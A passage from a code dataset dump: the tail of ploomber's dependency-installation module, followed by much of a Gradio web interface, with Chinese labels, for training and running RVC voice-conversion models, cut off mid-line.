use_lock else \"environment.dev.yml\"\n\n if Path(env_yml).exists():\n cmdr.run(\n pkg_manager,\n \"env\",\n \"update\",\n \"--file\",\n env_yml,\n \"--name\",\n env_name,\n description=\"Installing dev dependencies\",\n )\n\n if not use_lock:\n env_lock = cmdr.run(\n shutil.which(\"conda\"),\n \"env\",\n \"export\",\n \"--no-build\",\n \"--name\",\n env_name,\n description=\"Locking dev dependencies\",\n capture_output=True,\n )\n Path(\"environment.dev.lock.yml\").write_text(env_lock)\n\n\ndef _next_steps(cmdr, cmd_activate):\n cmdr.success(\"Next steps\")\n message = f\"$ {cmd_activate}\\n\" if cmd_activate else \"\"\n cmdr.print((f\"{message}$ ploomber build\"))\n cmdr.success()\n\n\ndef _pip_install(cmdr, pip, lock, requirements=_REQS_TXT):\n \"\"\"Install and freeze requirements\n\n Parameters\n ----------\n cmdr\n Commander instance\n\n pip\n Path to pip binary\n\n lock\n If true, locks dependencies and stores them in a requirements.lock.txt\n \"\"\"\n cmdr.run(\n pip,\n \"install\",\n \"--requirement\",\n requirements,\n description=\"Installing dependencies\",\n )\n\n if lock:\n pip_lock = cmdr.run(\n pip,\n \"freeze\",\n \"--exclude-editable\",\n description=\"Locking dependencies\",\n capture_output=True,\n )\n check_mixed_envs(pip_lock)\n name = Path(requirements).stem\n Path(f\"{name}.lock.txt\").write_text(pip_lock)\n\n\ndef _environment_yml_has_python(path):\n with open(path) as f:\n env_yml = yaml.safe_load(f)\n\n deps = env_yml.get(\"dependencies\", [])\n\n has_python = False\n idx = None\n\n for i, line in enumerate(deps):\n if isinstance(line, str) and line.startswith(\"python\"):\n has_python = True\n idx = i\n break\n\n if has_python:\n env_yml[\"dependencies\"].pop(idx)\n\n return has_python, env_yml\n\n\n@contextmanager\ndef check_environment_yaml(path, enable=True):\n has_python, env_yml = _environment_yml_has_python(path)\n TMP_FILENAME = \".ploomber-conda-tmp.yml\"\n\n if has_python and enable:\n path_to_use = Path(TMP_FILENAME)\n path_to_use.write_text(yaml.dump(env_yml))\n click.secho(\n f\"WARNING: {path!r} contains Python as \"\n \"dependency, ignoring it as it may break \"\n \"the current environment\",\n fg=\"yellow\",\n )\n else:\n path_to_use = Path(path)\n\n try:\n yield str(path_to_use)\n finally:\n if Path(TMP_FILENAME).exists():\n path_to_use.unlink()\n","repo_name":"ploomber/ploomber","sub_path":"src/ploomber/cli/install.py","file_name":"install.py","file_ext":"py","file_size_in_byte":17063,"program_lang":"python","lang":"en","doc_type":"code","stars":3258,"dataset":"github-code","pt":"66"} +{"seq_id":"40540222346","text":"from multiprocessing import cpu_count\r\nimport threading\r\nfrom time import sleep\r\nfrom subprocess import Popen,PIPE,run as runn\r\nfrom time import sleep\r\nimport torch, pdb, os,traceback,sys,warnings,shutil,numpy as np,faiss\r\n#判断是否有能用来训练和加速推理的N卡\r\nncpu=cpu_count()\r\nngpu=torch.cuda.device_count()\r\ngpu_infos=[]\r\nif(torch.cuda.is_available()==False or ngpu==0):if_gpu_ok=False\r\nelse:\r\n if_gpu_ok = False\r\n for i in range(ngpu):\r\n gpu_name=torch.cuda.get_device_name(i)\r\n if(\"16\"in gpu_name or \"MX\"in gpu_name):continue\r\n if(\"10\"in gpu_name or \"20\"in gpu_name or \"30\"in gpu_name or \"40\"in gpu_name or \"A50\"in gpu_name.upper() or \"70\"in gpu_name or \"80\"in gpu_name or \"90\"in gpu_name or \"M4\"in gpu_name or \"T4\"in gpu_name or \"TITAN\"in gpu_name.upper()):#A10#A100#V100#A40#P40#M40#K80\r\n if_gpu_ok=True#至少有一张能用的N卡\r\n gpu_infos.append(\"%s\\t%s\"%(i,gpu_name))\r\ngpu_info=\"\\n\".join(gpu_infos)if if_gpu_ok==True and len(gpu_infos)>0 else \"很遗憾您这没有能用的显卡来支持您训练\"\r\ngpus=\"-\".join([i[0]for i in gpu_infos])\r\nnow_dir=os.getcwd()\r\nsys.path.append(now_dir)\r\ntmp=os.path.join(now_dir,\"TEMP\")\r\nshutil.rmtree(tmp,ignore_errors=True)\r\nos.makedirs(tmp,exist_ok=True)\r\nos.makedirs(os.path.join(now_dir,\"logs\"),exist_ok=True)\r\nos.makedirs(os.path.join(now_dir,\"weights\"),exist_ok=True)\r\nos.environ[\"TEMP\"]=tmp\r\nwarnings.filterwarnings(\"ignore\")\r\ntorch.manual_seed(114514)\r\nfrom infer_pack.models import SynthesizerTrnMs256NSFsid, SynthesizerTrnMs256NSFsid_nono\r\nfrom scipy.io import wavfile\r\nfrom fairseq import checkpoint_utils\r\nimport gradio as gr\r\nimport librosa\r\nimport logging\r\nfrom vc_infer_pipeline import VC\r\nimport soundfile as sf\r\nfrom config import is_half,device,is_half\r\nfrom infer_uvr5 import _audio_pre_\r\nfrom my_utils import load_audio\r\nfrom train.process_ckpt import show_info,change_info,merge,extract_small_model\r\n# from trainset_preprocess_pipeline import PreProcess\r\nlogging.getLogger('numba').setLevel(logging.WARNING)\r\n\r\nclass ToolButton(gr.Button, gr.components.FormComponent):\r\n \"\"\"Small button with single emoji as text, fits inside gradio forms\"\"\"\r\n def __init__(self, **kwargs):\r\n super().__init__(variant=\"tool\", **kwargs)\r\n def get_block_name(self):\r\n return \"button\"\r\n\r\nhubert_model=None\r\ndef load_hubert():\r\n global hubert_model\r\n models, saved_cfg, task = checkpoint_utils.load_model_ensemble_and_task([\"hubert_base.pt\"],suffix=\"\",)\r\n hubert_model = models[0]\r\n hubert_model = hubert_model.to(device)\r\n if(is_half):hubert_model = hubert_model.half()\r\n else:hubert_model = hubert_model.float()\r\n hubert_model.eval()\r\n\r\nweight_root=\"weights\"\r\nweight_uvr5_root=\"uvr5_weights\"\r\nnames=[]\r\nfor name in os.listdir(weight_root):names.append(name)\r\nuvr5_names=[]\r\nfor name in os.listdir(weight_uvr5_root):uvr5_names.append(name.replace(\".pth\",\"\"))\r\n\r\ndef vc_single(sid,input_audio,f0_up_key,f0_file,f0_method,file_index,file_big_npy,index_rate):#spk_item, input_audio0, vc_transform0,f0_file,f0method0\r\n global tgt_sr,net_g,vc,hubert_model\r\n if input_audio is None:return \"You need to upload an audio\", None\r\n f0_up_key = int(f0_up_key)\r\n try:\r\n audio=load_audio(input_audio,16000)\r\n times = [0, 0, 0]\r\n if(hubert_model==None):load_hubert()\r\n if_f0 = cpt.get(\"f0\", 1)\r\n audio_opt=vc.pipeline(hubert_model,net_g,sid,audio,times,f0_up_key,f0_method,file_index,file_big_npy,index_rate,if_f0,f0_file=f0_file)\r\n print(times)\r\n return \"Success\", (tgt_sr, audio_opt)\r\n except:\r\n info=traceback.format_exc()\r\n print(info)\r\n return info,(None,None)\r\n\r\ndef vc_multi(sid,dir_path,opt_root,paths,f0_up_key,f0_method,file_index,file_big_npy,index_rate):\r\n try:\r\n dir_path=dir_path.strip(\" \")#防止小白拷路径头尾带了空格\r\n opt_root=opt_root.strip(\" \")\r\n os.makedirs(opt_root, exist_ok=True)\r\n try:\r\n if(dir_path!=\"\"):paths=[os.path.join(dir_path,name)for name in os.listdir(dir_path)]\r\n else:paths=[path.name for path in paths]\r\n except:\r\n traceback.print_exc()\r\n paths = [path.name for path in paths]\r\n infos=[]\r\n for path in paths:\r\n info,opt=vc_single(sid,path,f0_up_key,None,f0_method,file_index,file_big_npy,index_rate)\r\n if(info==\"Success\"):\r\n try:\r\n tgt_sr,audio_opt=opt\r\n wavfile.write(\"%s/%s\" % (opt_root, os.path.basename(path)), tgt_sr, audio_opt)\r\n except:\r\n info=traceback.format_exc()\r\n infos.append(\"%s->%s\"%(os.path.basename(path),info))\r\n yield \"\\n\".join(infos)\r\n yield \"\\n\".join(infos)\r\n except:\r\n yield traceback.format_exc()\r\n\r\ndef uvr(model_name,inp_root,save_root_vocal,paths,save_root_ins):\r\n infos = []\r\n try:\r\n inp_root = inp_root.strip(\" \").strip(\"\\n\")\r\n save_root_vocal = save_root_vocal.strip(\" \").strip(\"\\n\")\r\n save_root_ins = save_root_ins.strip(\" \").strip(\"\\n\")\r\n pre_fun = _audio_pre_(model_path=os.path.join(weight_uvr5_root,model_name+\".pth\"), device=device, is_half=is_half)\r\n if (inp_root != \"\"):paths = [os.path.join(inp_root, name) for name in os.listdir(inp_root)]\r\n else:paths = [path.name for path in paths]\r\n for name in paths:\r\n inp_path=os.path.join(inp_root,name)\r\n try:\r\n pre_fun._path_audio_(inp_path , save_root_ins,save_root_vocal)\r\n infos.append(\"%s->Success\"%(os.path.basename(inp_path)))\r\n yield \"\\n\".join(infos)\r\n except:\r\n infos.append(\"%s->%s\" % (os.path.basename(inp_path),traceback.format_exc()))\r\n yield \"\\n\".join(infos)\r\n except:\r\n infos.append(traceback.format_exc())\r\n yield \"\\n\".join(infos)\r\n finally:\r\n try:\r\n del pre_fun.model\r\n del pre_fun\r\n except:\r\n traceback.print_exc()\r\n print(\"clean_empty_cache\")\r\n torch.cuda.empty_cache()\r\n yield \"\\n\".join(infos)\r\n\r\n#一个选项卡全局只能有一个音色\r\ndef get_vc(sid):\r\n global n_spk,tgt_sr,net_g,vc,cpt\r\n if(sid==\"\"):\r\n global hubert_model\r\n print(\"clean_empty_cache\")\r\n del net_g, n_spk, vc, hubert_model,tgt_sr#,cpt\r\n hubert_model = net_g=n_spk=vc=hubert_model=tgt_sr=None\r\n torch.cuda.empty_cache()\r\n ###楼下不这么折腾清理不干净\r\n if_f0 = cpt.get(\"f0\", 1)\r\n if (if_f0 == 1):\r\n net_g = SynthesizerTrnMs256NSFsid(*cpt[\"config\"], is_half=is_half)\r\n else:\r\n net_g = SynthesizerTrnMs256NSFsid_nono(*cpt[\"config\"])\r\n del net_g,cpt\r\n torch.cuda.empty_cache()\r\n cpt=None\r\n return {\"visible\": False, \"__type__\": \"update\"}\r\n person = \"%s/%s\" % (weight_root, sid)\r\n print(\"loading %s\"%person)\r\n cpt = torch.load(person, map_location=\"cpu\")\r\n tgt_sr = cpt[\"config\"][-1]\r\n cpt[\"config\"][-3]=cpt[\"weight\"][\"emb_g.weight\"].shape[0]#n_spk\r\n if_f0=cpt.get(\"f0\",1)\r\n if(if_f0==1):\r\n net_g = SynthesizerTrnMs256NSFsid(*cpt[\"config\"], is_half=is_half)\r\n else:\r\n net_g = SynthesizerTrnMs256NSFsid_nono(*cpt[\"config\"])\r\n del net_g.enc_q\r\n print(net_g.load_state_dict(cpt[\"weight\"], strict=False)) # 不加这一行清不干净,真奇葩\r\n net_g.eval().to(device)\r\n if (is_half):net_g = net_g.half()\r\n else:net_g = net_g.float()\r\n vc = VC(tgt_sr, device, is_half)\r\n n_spk=cpt[\"config\"][-3]\r\n return {\"visible\": True,\"maximum\": n_spk, \"__type__\": \"update\"}\r\n\r\ndef change_choices():return {\"choices\": sorted(list(os.listdir(weight_root))), \"__type__\": \"update\"}\r\ndef clean():return {\"value\": \"\", \"__type__\": \"update\"}\r\ndef change_f0(if_f0_3,sr2):#np7, f0method8,pretrained_G14,pretrained_D15\r\n if(if_f0_3==\"是\"):return {\"visible\": True, \"__type__\": \"update\"},{\"visible\": True, \"__type__\": \"update\"},\"pretrained/f0G%s.pth\"%sr2,\"pretrained/f0D%s.pth\"%sr2\r\n return {\"visible\": False, \"__type__\": \"update\"}, {\"visible\": False, \"__type__\": \"update\"},\"pretrained/G%s.pth\"%sr2,\"pretrained/D%s.pth\"%sr2\r\n\r\nsr_dict={\r\n \"32k\":32000,\r\n \"40k\":40000,\r\n \"48k\":48000,\r\n}\r\n\r\ndef if_done(done,p):\r\n while 1:\r\n if(p.poll()==None):sleep(0.5)\r\n else:break\r\n done[0]=True\r\n\r\n\r\ndef if_done_multi(done,ps):\r\n while 1:\r\n #poll==None代表进程未结束\r\n #只要有一个进程未结束都不停\r\n flag=1\r\n for p in ps:\r\n if(p.poll()==None):\r\n flag = 0\r\n sleep(0.5)\r\n break\r\n if(flag==1):break\r\n done[0]=True\r\n\r\ndef preprocess_dataset(trainset_dir,exp_dir,sr,n_p=ncpu):\r\n sr=sr_dict[sr]\r\n os.makedirs(\"%s/logs/%s\"%(now_dir,exp_dir),exist_ok=True)\r\n f = open(\"%s/logs/%s/preprocess.log\"%(now_dir,exp_dir), \"w\")\r\n f.close()\r\n cmd=\"python trainset_preprocess_pipeline_print.py %s %s %s %s/logs/%s\"%(trainset_dir,sr,n_p,now_dir,exp_dir)\r\n print(cmd)\r\n p = Popen(cmd, shell=True)#, stdin=PIPE, stdout=PIPE,stderr=PIPE,cwd=now_dir\r\n ###煞笔gr,popen read都非得全跑完了再一次性读取,不用gr就正常读一句输出一句;只能额外弄出一个文本流定时读\r\n done=[False]\r\n threading.Thread(target=if_done,args=(done,p,)).start()\r\n while(1):\r\n with open(\"%s/logs/%s/preprocess.log\"%(now_dir,exp_dir),\"r\")as f:yield(f.read())\r\n sleep(1)\r\n if(done[0]==True):break\r\n with open(\"%s/logs/%s/preprocess.log\"%(now_dir,exp_dir), \"r\")as f:log = f.read()\r\n print(log)\r\n yield log\r\n#but2.click(extract_f0,[gpus6,np7,f0method8,if_f0_3,trainset_dir4],[info2])\r\ndef extract_f0_feature(gpus,n_p,f0method,if_f0,exp_dir):\r\n gpus=gpus.split(\"-\")\r\n os.makedirs(\"%s/logs/%s\"%(now_dir,exp_dir),exist_ok=True)\r\n f = open(\"%s/logs/%s/extract_f0_feature.log\"%(now_dir,exp_dir), \"w\")\r\n f.close()\r\n if(if_f0==\"是\"):\r\n cmd=\"python extract_f0_print.py %s/logs/%s %s %s\"%(now_dir,exp_dir,n_p,f0method)\r\n print(cmd)\r\n p = Popen(cmd, shell=True,cwd=now_dir)#, stdin=PIPE, stdout=PIPE,stderr=PIPE\r\n ###煞笔gr,popen read都非得全跑完了再一次性读取,不用gr就正常读一句输出一句;只能额外弄出一个文本流定时读\r\n done=[False]\r\n threading.Thread(target=if_done,args=(done,p,)).start()\r\n while(1):\r\n with open(\"%s/logs/%s/extract_f0_feature.log\"%(now_dir,exp_dir),\"r\")as f:yield(f.read())\r\n sleep(1)\r\n if(done[0]==True):break\r\n with open(\"%s/logs/%s/extract_f0_feature.log\"%(now_dir,exp_dir), \"r\")as f:log = f.read()\r\n print(log)\r\n yield log\r\n ####对不同part分别开多进程\r\n '''\r\n n_part=int(sys.argv[1])\r\n i_part=int(sys.argv[2])\r\n i_gpu=sys.argv[3]\r\n exp_dir=sys.argv[4]\r\n os.environ[\"CUDA_VISIBLE_DEVICES\"]=str(i_gpu)\r\n '''\r\n leng=len(gpus)\r\n ps=[]\r\n for idx,n_g in enumerate(gpus):\r\n cmd=\"python extract_feature_print.py %s %s %s %s/logs/%s\"%(leng,idx,n_g,now_dir,exp_dir)\r\n print(cmd)\r\n p = Popen(cmd, shell=True, cwd=now_dir)#, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE, cwd=now_dir\r\n ps.append(p)\r\n ###煞笔gr,popen read都非得全跑完了再一次性读取,不用gr就正常读一句输出一句;只能额外弄出一个文本流定时读\r\n done = [False]\r\n threading.Thread(target=if_done_multi, args=(done, ps,)).start()\r\n while (1):\r\n with open(\"%s/logs/%s/extract_f0_feature.log\"%(now_dir,exp_dir), \"r\")as f:yield (f.read())\r\n sleep(1)\r\n if (done[0] == True): break\r\n with open(\"%s/logs/%s/extract_f0_feature.log\"%(now_dir,exp_dir), \"r\")as f:log = f.read()\r\n print(log)\r\n yield log\r\ndef change_sr2(sr2,if_f0_3):\r\n if(if_f0_3==\"是\"):return \"pretrained/f0G%s.pth\"%sr2,\"pretrained/f0D%s.pth\"%sr2\r\n else:return \"pretrained/G%s.pth\"%sr2,\"pretrained/D%s.pth\"%sr2\r\n#but3.click(click_train,[exp_dir1,sr2,if_f0_3,save_epoch10,total_epoch11,batch_size12,if_save_latest13,pretrained_G14,pretrained_D15,gpus16])\r\ndef click_train(exp_dir1,sr2,if_f0_3,spk_id5,save_epoch10,total_epoch11,batch_size12,if_save_latest13,pretrained_G14,pretrained_D15,gpus16,if_cache_gpu17):\r\n #生成filelist\r\n exp_dir=\"%s/logs/%s\"%(now_dir,exp_dir1)\r\n os.makedirs(exp_dir,exist_ok=True)\r\n gt_wavs_dir=\"%s/0_gt_wavs\"%(exp_dir)\r\n co256_dir=\"%s/3_feature256\"%(exp_dir)\r\n if(if_f0_3==\"是\"):\r\n f0_dir = \"%s/2a_f0\" % (exp_dir)\r\n f0nsf_dir=\"%s/2b-f0nsf\"%(exp_dir)\r\n names=set([name.split(\".\")[0]for name in os.listdir(gt_wavs_dir)])&set([name.split(\".\")[0]for name in os.listdir(co256_dir)])&set([name.split(\".\")[0]for name in os.listdir(f0_dir)])&set([name.split(\".\")[0]for name in os.listdir(f0nsf_dir)])\r\n else:\r\n names=set([name.split(\".\")[0]for name in os.listdir(gt_wavs_dir)])&set([name.split(\".\")[0]for name in os.listdir(co256_dir)])\r\n opt=[]\r\n for name in names:\r\n if (if_f0_3 == \"是\"):\r\n opt.append(\"%s/%s.wav|%s/%s.npy|%s/%s.wav.npy|%s/%s.wav.npy|%s\"%(gt_wavs_dir.replace(\"\\\\\",\"\\\\\\\\\"),name,co256_dir.replace(\"\\\\\",\"\\\\\\\\\"),name,f0_dir.replace(\"\\\\\",\"\\\\\\\\\"),name,f0nsf_dir.replace(\"\\\\\",\"\\\\\\\\\"),name,spk_id5))\r\n else:\r\n opt.append(\"%s/%s.wav|%s/%s.npy|%s\"%(gt_wavs_dir.replace(\"\\\\\",\"\\\\\\\\\"),name,co256_dir.replace(\"\\\\\",\"\\\\\\\\\"),name,spk_id5))\r\n with open(\"%s/filelist.txt\"%exp_dir,\"w\")as f:f.write(\"\\n\".join(opt))\r\n print(\"write filelist done\")\r\n #生成config#无需生成config\r\n # cmd = \"python train_nsf_sim_cache_sid_load_pretrain.py -e mi-test -sr 40k -f0 1 -bs 4 -g 0 -te 10 -se 5 -pg pretrained/f0G40k.pth -pd pretrained/f0D40k.pth -l 1 -c 0\"\r\n cmd = \"python train_nsf_sim_cache_sid_load_pretrain.py -e %s -sr %s -f0 %s -bs %s -g %s -te %s -se %s -pg %s -pd %s -l %s -c %s\" % (exp_dir1,sr2,1 if if_f0_3==\"是\"else 0,batch_size12,gpus16,total_epoch11,save_epoch10,pretrained_G14,pretrained_D15,1 if if_save_latest13==\"是\"else 0,1 if if_cache_gpu17==\"是\"else 0)\r\n print(cmd)\r\n p = Popen(cmd, shell=True, cwd=now_dir)\r\n p.wait()\r\n return \"训练结束,您可查看控制台训练日志或实验文件夹下的train.log\"\r\n# but4.click(train_index, [exp_dir1], info3)\r\ndef train_index(exp_dir1):\r\n exp_dir=\"%s/logs/%s\"%(now_dir,exp_dir1)\r\n os.makedirs(exp_dir,exist_ok=True)\r\n feature_dir=\"%s/3_feature256\"%(exp_dir)\r\n if(os.path.exists(feature_dir)==False):return \"请先进行特征提取!\"\r\n listdir_res=list(os.listdir(feature_dir))\r\n if(len(listdir_res)==0):return \"请先进行特征提取!\"\r\n npys = []\r\n for name in sorted(listdir_res):\r\n phone = np.load(\"%s/%s\" % (feature_dir, name))\r\n npys.append(phone)\r\n big_npy = np.concatenate(npys, 0)\r\n np.save(\"%s/total_fea.npy\"%exp_dir, big_npy)\r\n n_ivf = big_npy.shape[0] // 39\r\n infos=[]\r\n infos.append(\"%s,%s\"%(big_npy.shape,n_ivf))\r\n yield \"\\n\".join(infos)\r\n index = faiss.index_factory(256, \"IVF%s,Flat\"%n_ivf)\r\n infos.append(\"training\")\r\n yield \"\\n\".join(infos)\r\n index_ivf = faiss.extract_index_ivf(index) #\r\n index_ivf.nprobe = int(np.power(n_ivf,0.3))\r\n index.train(big_npy)\r\n faiss.write_index(index, '%s/trained_IVF%s_Flat_nprobe_%s.index'%(exp_dir,n_ivf,index_ivf.nprobe))\r\n infos.append(\"adding\")\r\n yield \"\\n\".join(infos)\r\n index.add(big_npy)\r\n faiss.write_index(index, '%s/added_IVF%s_Flat_nprobe_%s.index'%(exp_dir,n_ivf,index_ivf.nprobe))\r\n infos.append(\"成功构建索引,added_IVF%s_Flat_nprobe_%s.index\"%(n_ivf,index_ivf.nprobe))\r\n yield \"\\n\".join(infos)\r\n#but5.click(train1key, [exp_dir1, sr2, if_f0_3, trainset_dir4, spk_id5, gpus6, np7, f0method8, save_epoch10, total_epoch11, batch_size12, if_save_latest13, pretrained_G14, pretrained_D15, gpus16, if_cache_gpu17], info3)\r\ndef train1key(exp_dir1, sr2, if_f0_3, trainset_dir4, spk_id5, gpus6, np7, f0method8, save_epoch10, total_epoch11, batch_size12, if_save_latest13, pretrained_G14, pretrained_D15, gpus16, if_cache_gpu17):\r\n infos=[]\r\n def get_info_str(strr):\r\n infos.append(strr)\r\n return \"\\n\".join(infos)\r\n os.makedirs(\"%s/logs/%s\"%(now_dir,exp_dir1),exist_ok=True)\r\n #########step1:处理数据\r\n open(\"%s/logs/%s/preprocess.log\"%(now_dir,exp_dir1), \"w\").close()\r\n cmd=\"python trainset_preprocess_pipeline_print.py %s %s %s %s/logs/%s\"%(trainset_dir4,sr_dict[sr2],ncpu,now_dir,exp_dir1)\r\n yield get_info_str(\"step1:正在处理数据\")\r\n yield get_info_str(cmd)\r\n p = Popen(cmd, shell=True)\r\n p.wait()\r\n with open(\"%s/logs/%s/preprocess.log\" % (now_dir, exp_dir1), \"r\")as f: print(f.read())\r\n #########step2a:提取音高\r\n open(\"%s/logs/%s/extract_f0_feature.log\" % (now_dir, exp_dir1), \"w\")\r\n if(if_f0_3==\"是\"):\r\n yield get_info_str(\"step2a:正在提取音高\")\r\n cmd=\"python extract_f0_print.py %s/logs/%s %s %s\"%(now_dir,exp_dir1,np7,f0method8)\r\n yield get_info_str(cmd)\r\n p = Popen(cmd, shell=True,cwd=now_dir)\r\n p.wait()\r\n with open(\"%s/logs/%s/extract_f0_feature.log\"%(now_dir,exp_dir1), \"r\")as f:print(f.read())\r\n else:yield get_info_str(\"step2a:无需提取音高\")\r\n #######step2b:提取特征\r\n yield get_info_str(\"step2b:正在提取特征\")\r\n gpus=gpus16.split(\"-\")\r\n leng=len(gpus)\r\n ps=[]\r\n for idx,n_g in enumerate(gpus):\r\n cmd=\"python extract_feature_print.py %s %s %s %s/logs/%s\"%(leng,idx,n_g,now_dir,exp_dir1)\r\n yield get_info_str(cmd)\r\n p = Popen(cmd, shell=True, cwd=now_dir)#, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE, cwd=now_dir\r\n ps.append(p)\r\n for p in ps:p.wait()\r\n with open(\"%s/logs/%s/extract_f0_feature.log\"%(now_dir,exp_dir1), \"r\")as f:print(f.read())\r\n #######step3a:训练模型\r\n yield get_info_str(\"step3a:正在训练模型\")\r\n #生成filelist\r\n exp_dir=\"%s/logs/%s\"%(now_dir,exp_dir1)\r\n gt_wavs_dir=\"%s/0_gt_wavs\"%(exp_dir)\r\n co256_dir=\"%s/3_feature256\"%(exp_dir)\r\n if(if_f0_3==\"是\"):\r\n f0_dir = \"%s/2a_f0\" % (exp_dir)\r\n f0nsf_dir=\"%s/2b-f0nsf\"%(exp_dir)\r\n names=set([name.split(\".\")[0]for name in os.listdir(gt_wavs_dir)])&set([name.split(\".\")[0]for name in os.listdir(co256_dir)])&set([name.split(\".\")[0]for name in os.listdir(f0_dir)])&set([name.split(\".\")[0]for name in os.listdir(f0nsf_dir)])\r\n else:\r\n names=set([name.split(\".\")[0]for name in os.listdir(gt_wavs_dir)])&set([name.split(\".\")[0]for name in os.listdir(co256_dir)])\r\n opt=[]\r\n for name in names:\r\n if (if_f0_3 == \"是\"):\r\n opt.append(\"%s/%s.wav|%s/%s.npy|%s/%s.wav.npy|%s/%s.wav.npy|%s\"%(gt_wavs_dir.replace(\"\\\\\",\"\\\\\\\\\"),name,co256_dir.replace(\"\\\\\",\"\\\\\\\\\"),name,f0_dir.replace(\"\\\\\",\"\\\\\\\\\"),name,f0nsf_dir.replace(\"\\\\\",\"\\\\\\\\\"),name,spk_id5))\r\n else:\r\n opt.append(\"%s/%s.wav|%s/%s.npy|%s\"%(gt_wavs_dir.replace(\"\\\\\",\"\\\\\\\\\"),name,co256_dir.replace(\"\\\\\",\"\\\\\\\\\"),name,spk_id5))\r\n with open(\"%s/filelist.txt\"%exp_dir,\"w\")as f:f.write(\"\\n\".join(opt))\r\n yield get_info_str(\"write filelist done\")\r\n cmd = \"python train_nsf_sim_cache_sid_load_pretrain.py -e %s -sr %s -f0 %s -bs %s -g %s -te %s -se %s -pg %s -pd %s -l %s -c %s\" % (exp_dir1,sr2,1 if if_f0_3==\"是\"else 0,batch_size12,gpus16,total_epoch11,save_epoch10,pretrained_G14,pretrained_D15,1 if if_save_latest13==\"是\"else 0,1 if if_cache_gpu17==\"是\"else 0)\r\n yield get_info_str(cmd)\r\n p = Popen(cmd, shell=True, cwd=now_dir)\r\n p.wait()\r\n yield get_info_str(\"训练结束,您可查看控制台训练日志或实验文件夹下的train.log\")\r\n #######step3b:训练索引\r\n feature_dir=\"%s/3_feature256\"%(exp_dir)\r\n npys = []\r\n listdir_res=list(os.listdir(feature_dir))\r\n for name in sorted(listdir_res):\r\n phone = np.load(\"%s/%s\" % (feature_dir, name))\r\n npys.append(phone)\r\n big_npy = np.concatenate(npys, 0)\r\n np.save(\"%s/total_fea.npy\"%exp_dir, big_npy)\r\n n_ivf = big_npy.shape[0] // 39\r\n yield get_info_str(\"%s,%s\"%(big_npy.shape,n_ivf))\r\n index = faiss.index_factory(256, \"IVF%s,Flat\"%n_ivf)\r\n yield get_info_str(\"training index\")\r\n index_ivf = faiss.extract_index_ivf(index) #\r\n index_ivf.nprobe = int(np.power(n_ivf,0.3))\r\n index.train(big_npy)\r\n faiss.write_index(index, '%s/trained_IVF%s_Flat_nprobe_%s.index'%(exp_dir,n_ivf,index_ivf.nprobe))\r\n yield get_info_str(\"adding index\")\r\n index.add(big_npy)\r\n faiss.write_index(index, '%s/added_IVF%s_Flat_nprobe_%s.index'%(exp_dir,n_ivf,index_ivf.nprobe))\r\n yield get_info_str(\"成功构建索引,added_IVF%s_Flat_nprobe_%s.index\"%(n_ivf,index_ivf.nprobe))\r\n yield get_info_str(\"全流程结束!\")\r\n\r\n# ckpt_path2.change(change_info_,[ckpt_path2],[sr__,if_f0__])\r\ndef change_info_(ckpt_path):\r\n if(os.path.exists(ckpt_path.replace(os.path.basename(ckpt_path),\"train.log\"))==False):return {\"__type__\": \"update\"},{\"__type__\": \"update\"}\r\n try:\r\n with open(ckpt_path.replace(os.path.basename(ckpt_path),\"train.log\"),\"r\")as f:\r\n info=eval(f.read().strip(\"\\n\").split(\"\\n\")[0].split(\"\\t\")[-1])\r\n sr,f0=info[\"sample_rate\"],info[\"if_f0\"]\r\n return sr,str(f0)\r\n except:\r\n traceback.print_exc()\r\n return {\"__type__\": \"update\"}, {\"__type__\": \"update\"}\r\n\r\n\r\nwith gr.Blocks() as app:\r\n gr.Markdown(value=\"\"\"\r\n 本软件以MIT协议开源,作者不对软件具备任何控制力,使用软件者、传播软件导出的声音者自负全责。
        \r\n 如不认可该条款,则不能使用或引用软件包内任何代码和文件。详见根目录\"使用需遵守的协议-LICENSE.txt\"。\r\n \"\"\")\r\n with gr.Tabs():\r\n with gr.TabItem(\"模型推理\"):\r\n with gr.Row():\r\n sid0 = gr.Dropdown(label=\"推理音色\", choices=names)\r\n refresh_button = gr.Button(\"刷新音色列表\", variant=\"primary\")\r\n refresh_button.click(\r\n fn=change_choices,\r\n inputs=[],\r\n outputs=[sid0]\r\n )\r\n clean_button = gr.Button(\"卸载音色省显存\", variant=\"primary\")\r\n spk_item = gr.Slider(minimum=0, maximum=2333, step=1, label='请选择说话人id', value=0, visible=False, interactive=True)\r\n clean_button.click(\r\n fn=clean,\r\n inputs=[],\r\n outputs=[sid0]\r\n )\r\n sid0.change(\r\n fn=get_vc,\r\n inputs=[sid0],\r\n outputs=[spk_item],\r\n )\r\n with gr.Group():\r\n gr.Markdown(value=\"\"\"\r\n 男转女推荐+12key,女转男推荐-12key,如果音域爆炸导致音色失真也可以自己调整到合适音域。\r\n \"\"\")\r\n with gr.Row():\r\n with gr.Column():\r\n vc_transform0 = gr.Number(label=\"变调(整数,半音数量,升八度12降八度-12)\", value=0)\r\n input_audio0 = gr.Textbox(label=\"输入待处理音频文件路径(默认是正确格式示例)\",value=\"E:\\codes\\py39\\\\vits_vc_gpu_train\\\\todo-songs\\冬之花clip1.wav\")\r\n f0method0=gr.Radio(label=\"选择音高提取算法,输入歌声可用pm提速,harvest低音好但巨慢无比\", choices=[\"pm\",\"harvest\"],value=\"pm\", interactive=True)\r\n with gr.Column():\r\n file_index1 = gr.Textbox(label=\"特征���索库文件路径\",value=\"E:\\codes\\py39\\\\vits_vc_gpu_train\\logs\\mi-test-1key\\\\added_IVF677_Flat_nprobe_7.index\", interactive=True)\r\n file_big_npy1 = gr.Textbox(label=\"特征文件路径\",value=\"E:\\codes\\py39\\\\vits_vc_gpu_train\\logs\\mi-test-1key\\\\total_fea.npy\", interactive=True)\r\n index_rate1 = gr.Slider(minimum=0, maximum=1,label='检索特征占比', value=1,interactive=True)\r\n f0_file = gr.File(label=\"F0曲线文件,可选,一行一个音高,代替默认F0及升降调\")\r\n but0=gr.Button(\"转换\", variant=\"primary\")\r\n with gr.Column():\r\n vc_output1 = gr.Textbox(label=\"输出信息\")\r\n vc_output2 = gr.Audio(label=\"输出音频(右下角三个点,点了可以下载)\")\r\n but0.click(vc_single, [spk_item, input_audio0, vc_transform0,f0_file,f0method0,file_index1,file_big_npy1,index_rate1], [vc_output1, vc_output2])\r\n with gr.Group():\r\n gr.Markdown(value=\"\"\"\r\n 批量转换,输入待转换音频文件夹,或上传多个音频文件,在指定文件夹(默认opt)下输出转换的音频。\r\n \"\"\")\r\n with gr.Row():\r\n with gr.Column():\r\n vc_transform1 = 